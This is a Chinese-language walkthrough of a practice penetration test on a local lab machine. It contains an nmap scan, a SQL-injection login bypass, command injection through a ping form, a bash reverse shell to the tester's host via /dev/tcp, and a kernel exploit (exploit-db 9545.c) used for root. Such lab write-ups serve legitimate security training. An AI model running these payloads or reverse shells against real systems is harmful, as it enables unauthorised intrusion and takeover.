目标
本机IP:192.168.118.128
靶机IP:192.168.118.0/24
信息收集
常规 nmap 扫存活主机,扫端口
根据靶机IP容易得出靶机IP为 192.168.118.130
nmap -sP 192.168.118.0/24
nmap -p- 192.168.128.130
web渗透
存在web服务,查看web页面,发现存在登录
测试发现存在SQL注入漏洞
使用万能密码尝试登录,发现无法登录,抓取数据包发现是其符号呢被编码,直接修改数据尝试登录,OK了
登录成功,是一个ping功能,当有此功能或者其他执行命令的功能时,都可以合理的怀疑,是否可以拼接其他指令执行,测试发现有存在RCE漏洞,且有回显
127.0.0.1 && id
127.0.0.1;whoami
话不多说,直接反弹Shell走起
nc -lvvp 6666
127.0.0.1;bash -i >& /dev/tcp/192.168.118.128/6666 0>&1
得到Shell,尝试whoami命令,发现是 apache普通用户权限
提权
此时可以用提权辅助工具LinEnum
简介:
LinEnum是一款Linux文件枚举及权限提升检查工具,可以帮助渗透测试人员对linux系统漏洞或安全问题进行一键式测试
下载LinEnum工具:GitHub - rebootuser/LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks
开启服务,将本机LinEnum.sh文件上传到目标加以利用
python -m http.server 80
cd /tmp
wget 192.168.118.128/LinEnum.sh
chmod 777 LinEnum.sh
./LinEnum.sh
查看到此系统版本信息,推测其可能存在漏洞
尝试查询此漏洞
searchsploit linux 2.6 CentOS
第一个版本信息最为接近,尝试利用
Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / | linux/local/9545.c
找到此漏洞exp,然后常规上传到目标
locate linux/local/9545.c
pwd
cp /usr/share/exploitdb/exploits/linux/local/9545.c /root/Desktop
wget 192.168.118.128/9545.c
编译9545.c脚本文件并运行,whoami尝试,获得root权限
gcc -o exp 9545.c
./exp
反弹Shell
最后bash反弹Shell,成功
nc -lvvp 6666
127.0.0.1;bash -i >& /dev/tcp/192.168.118.128/6666 0>&1